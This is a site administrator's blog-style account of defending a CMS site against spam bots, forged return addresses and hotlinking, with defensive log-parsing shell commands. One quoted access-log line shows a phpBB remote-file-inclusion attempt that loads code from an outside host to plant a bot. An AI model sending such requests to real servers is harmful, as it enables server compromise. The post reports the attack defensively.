As I previously mentioned, there are people busy spamming every inch of the internet with all kinds of links. I have renamed the submit-page and the feedback-page, just to keep them away. At first I started to block them on a daily basis, but I stopped at 757 different addresses. I must have done something right, because that's when another type of spam flowed into my mailbox: someone is sending spam with faked return email-addresses that point to this domain. So now I get all kinds of "delivery failed" messages. I rerouted all mail to non-existing users to an account that has its mail deleted after 7 days, so that takes care of those. Even viruses use this domain as a return-address; the virus is named W32.Mixor.q (Numar).

Some time ago, I added a captcha to the feedback-module and the submit-module. I've done this to prevent people's robots from spamming me, as this is happening more and more.

Per day I see around 45 attempts to automatically post something. One other way to deal with automated spam is renaming the feedback-module to something else or just adding a word that has to be retyped; if you're original, the scripts won't work. For now, I have added the addresses to the ip-ban table nuke_banned_ip, so they can't try again. I'm working on a script that checks the apache logs for POST messages, filters out the feedback and submit pages and then sorts the ip-addresses. Of course I would have to manually filter out the messages I really received. To start off, I would use something like

grep POST /var/log/httpd/access* | egrep 'feedback|submit' | awk ' { print $2 } '| sort -u
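
A fuller version of the log check described above, as an added example that is not the author's script. It assumes Apache's common/combined log format (client address in the first field) and tests the request method itself rather than the word POST anywhere in the line; the function names and the sample log lines are made up for illustration.

```shell
#!/bin/sh
# Count POST requests to the feedback/submit pages per client address.
# Assumed log format (Apache common/combined):
#   host ident user [time zone] "METHOD path proto" status bytes ...
# so $1 = client address, $6 = "METHOD (leading quote included), $7 = path.
post_offenders() {
    # $1 = minimum number of POSTs before an address is listed (default 1)
    awk -v min="${1:-1}" '
        # Only real POST requests, and only to the two form pages.
        $6 == "\"POST" && tolower($7) ~ /feedback|submit/ { hits[$1]++ }
        END { for (ip in hits) if (hits[ip] >= min) print hits[ip], ip }
    ' | sort -k1,1nr -k2,2      # busiest address first
}

# Constructed sample lines (documentation addresses, not real traffic).
# The GET line carries "POST" in its referrer: a plain grep for POST would
# pick it up, the method test above does not.
sample_log() {
    cat <<'EOF'
192.0.2.10 - - [08/Nov/2005:10:00:01 +0100] "POST /modules.php?name=Feedback HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.10 - - [08/Nov/2005:10:00:09 +0100] "POST /modules.php?name=Submit_News HTTP/1.1" 200 640 "-" "Mozilla/4.0"
198.51.100.7 - - [08/Nov/2005:10:02:30 +0100] "POST /modules.php?name=Feedback HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [08/Nov/2005:10:03:00 +0100] "GET /modules.php?name=Feedback HTTP/1.1" 200 900 "http://example.com/?q=POST" "Mozilla/4.0"
192.0.2.10 - - [08/Nov/2005:10:05:44 +0100] "POST /modules.php?name=Feedback HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [08/Nov/2005:10:06:10 +0100] "POST /modules.php?name=Search HTTP/1.1" 200 300 "-" "Mozilla/4.0"
EOF
}

# Demo on the sample; on a server: cat /var/log/httpd/access* | post_offenders 5
sample_log | post_offenders
```

The output is a count followed by the address, so genuine one-off submissions stand out from addresses that post repeatedly and can be left out of the ban table.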

Someone is trying very hard to install perlbot on this server, and he's using a real old exploit in phpbb. This is installed, but not active, so all attempts ( GET /modules/Forums/admin/admin_board.php?phpbb_root_path=http://www.cavcav.net/levo.dat? HTTP/1.1" 200 9746 "-" "libwww-perl/5.65" ) just fail, but the CMS keeps gently denying access.

11 attempts at nov-8
63 attempts at nov-9
112 attempts at nov-10, they appear 6 times per hour.

Just when you think you've got everything covered, something unexpected pops up. Someone is linking to one of the sounds (this one) in a forum, so my server is serving this file to everyone who browses this thread. This file has become the most wanted file in just one and a half hours; it has been requested over 500 times. I stopped this hotlinking by adding the wav-extension to the hotlinking-prevention-script.